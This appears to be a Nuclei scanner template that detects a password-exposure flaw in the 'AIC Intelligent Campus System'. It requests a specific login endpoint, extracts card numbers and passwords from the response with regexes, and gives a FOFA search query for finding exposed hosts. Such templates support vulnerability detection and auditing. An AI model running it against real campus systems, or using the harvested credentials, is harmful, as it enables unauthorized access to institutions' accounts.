id: aic-intelligent-password-exposure

info:
  name: AIC Intelligent Campus System - Password Exposure
  author: SleepingBag945
  severity: medium
  description: |
    Due to the design logic defects, the super password is leaked, which can kill more than 40 campus systems.<br>
  metadata:
    max-request: 1
    fofa-query: title="AIC智能校园系统"
  tags: aic,exposure,password

http:
  - method: GET
    path:
      - "{{BaseURL}}/datacenter/dataOrigin.ashx?c=login"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200 && contains(body_1,"卡号\":\"") && contains(body_1,"密码\":\"")'
        condition: and

    extractors:
      - type: regex
        name: username
        part: body
        group: 1
        regex:
          - "\"卡号\":\"(.*?)\""

      - type: regex
        name: passwd
        part: body
        group: 1
        regex:
          - "\"密码\":\"(.*?)\""

# digest: 4a0a0047304502206f87e11bcce65796acff5f8867eb09f156d71b2ee9ccd4b14f5088b15708cf9d022100ce3a3da63ce4ddc7dbee1b7da7c10951dccf94f6c0bed55519978c458cfb7b3b:922c64590222798bb761d5b6d8e72950
